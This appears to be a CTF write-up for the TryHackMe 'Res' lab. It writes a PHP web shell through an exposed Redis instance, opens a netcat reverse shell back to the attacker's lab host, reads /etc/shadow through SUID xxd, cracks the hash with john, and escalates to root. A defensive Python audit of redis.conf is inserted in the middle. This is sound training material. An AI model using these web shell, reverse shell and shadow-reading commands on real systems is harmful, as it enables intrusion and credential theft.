Res
These notes are from a challenge I did @tryhackme called Res.
Flag 1
Scanning the environment, we find an Apache web server and a Redis database:
sudo nmap -sC -sV -sS 10.10.103.145 -p-
Connecting to Redis, we can point its dump file at the main Apache web root and write a simple PHP web shell:
redis-cli -h 10.10.103.145
>config set dir /var/www/html
>config set dbfilename shell.php
>set test "<?php system($_GET['cmd']);?>"
Before we visit our new page we should open a netcat listener:
nc -nvlp 666
Time to run our shell.php :)
http://10.10.103.145/shell.php?cmd=nc 10.10.146.116 667 -e /bin/sh
Once we are successfully connected we can stabilize the shell and read the first flag:
python3 -c 'import pty;pty.spawn("/bin/bash")'
cat /home/vianka/user.txt
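The Redis misconfiguration this section relies on, seen from the defender's side: an added Python audit (not part of the writeup or the challenge box) that parses a constructed redis.conf, flags the settings that let an unauthenticated client retarget the dump file into the web root, and shows the hardened counterpart. The web-root list and the sample paths are assumptions.

```python
# Constructed redis.conf fragments (not taken from the challenge box).
# WEAK_CONF reproduces the state the writeup abuses: no auth, reachable from
# the network, and the dump file already pointed at the web root.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
dir /var/www/html
dbfilename shell.php
"""
# Hardened counterpart: loopback only, auth required, dump kept in the data
# dir, and CONFIG renamed so a client cannot retarget dir/dbfilename at all.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
requirepass CHANGE-ME-long-random-secret
dir /var/lib/redis
dbfilename dump.rdb
rename-command CONFIG ""
"""
# Assumed web-root prefixes a dump file must never land under.
WEB_ROOTS = ("/var/www", "/srv/http", "/usr/share/nginx")

def parse_conf(text):
    """Map each directive to its value, skipping blanks and comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            conf[key.lower()] = value.strip().strip('"')
    return conf

def audit(text):
    """Return the findings that together make the dir/dbfilename trick work."""
    c = parse_conf(text)
    found = []
    if not c.get("requirepass"):
        found.append("no requirepass: any client reaching the port can run CONFIG SET")
    bind = c.get("bind", "0.0.0.0")
    if not all(t.lstrip("-") in ("127.0.0.1", "::1") for t in bind.split()):
        found.append("bind %s: listener exposed beyond localhost" % bind)
    if c.get("protected-mode", "yes").lower() == "no":
        found.append("protected-mode no: unauthenticated remote access permitted")
    if c.get("dir", "").startswith(WEB_ROOTS):
        found.append("dir %s: dump file lands inside a web root" % c["dir"])
    if not c.get("dbfilename", "dump.rdb").endswith(".rdb"):
        found.append("dbfilename %s: dump would be served as a script" % c["dbfilename"])
    return found
```

Running audit() over WEAK_CONF yields five findings and over HARDENED_CONF none; on a live host the same checks apply to the output of CONFIG GET from an authenticated admin session.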
Flag 2
Let's have a look at /etc/passwd:
cat /etc/passwd
vianka:x:1000:1000:Res,,,:/home/vianka:/bin/bash
The SUID bit is set on xxd. To read the shadow file we can use this trick:
LFILE=/etc/shadow
xxd "$LFILE" | xxd -r
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::
Time to crack the password:
unshadow passwd.txt shadow.txt > hash.txt
john hash.txt
Once we have the password we can escalate our privileges to vianka, who also turns out to have root access via sudo.
su vianka
sudo su
cat /root/root.txt